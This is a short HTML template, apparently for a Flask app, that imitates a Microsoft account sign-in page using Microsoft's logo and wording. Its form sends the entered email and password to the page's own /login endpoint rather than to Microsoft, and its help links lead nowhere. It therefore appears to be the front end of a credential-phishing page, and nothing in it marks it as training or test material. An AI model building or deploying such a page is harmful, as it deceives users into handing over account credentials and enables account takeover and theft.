<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <title>Sign in to your Microsoft account</title>
  <link rel="stylesheet" href="{{ url_for('static', filename='css/modern.css') }}">
</head>
<body>
  <div class="login-card">
    <div class="logo-title">
      <img class="logo" src="https://upload.wikimedia.org/wikipedia/commons/4/44/Microsoft_logo.svg" alt="Microsoft Logo">
      <span class="ms-text">Microsoft</span>
    </div>
    <h2>Sign in</h2>
    <form action="/login" method="POST">
      <input type="text" name="username" placeholder="Email, phone, or Skype" required>
      <input type="password" name="password" placeholder="Password" required>
      <button type="submit">Sign in</button>
    </form>
    <div class="links">
      <a href="#">Can't access your account?</a><br>
      <a href="#">Sign-in options</a>
    </div>
  </div>
</body>
</html>
